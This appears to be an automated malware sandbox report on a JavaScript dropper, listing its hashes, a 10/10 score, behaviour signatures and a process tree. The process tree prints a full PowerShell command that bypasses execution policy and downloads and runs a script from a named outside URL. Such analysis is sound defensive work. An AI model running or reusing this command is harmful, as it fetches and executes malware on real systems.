Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
05-03-2024 02:43
General
-
Target
c31b0a69e3c2cdb394754dbce34aaba8e79e809285177faffdb1506b6f05a01f.js
-
Size
65KB
-
MD5
5a386788ea13ca8f516f3a304c3b13fa
-
SHA1
8e3a1bda560808459e5938afa426f84ba3acfeb3
-
SHA256
c31b0a69e3c2cdb394754dbce34aaba8e79e809285177faffdb1506b6f05a01f
-
SHA512
2480cc7b183529906a59ceb02a712b07b1e33ec9fcf77db367e0c374f7a0d437fde99454f8229ad5c9e676eee2866f70f6721df2d34e88a251367da267fada18
-
SSDEEP
1536:ol33+qFCiH1CslxL7v3+AhFb0Er1U6h2DHXjW03apMFFfPQWQsNcl7VlH8aFCy8m:dqAC1CslxLL+0Vj1YK03aUfPQW3al7VN
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\c31b0a69e3c2cdb394754dbce34aaba8e79e809285177faffdb1506b6f05a01f.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB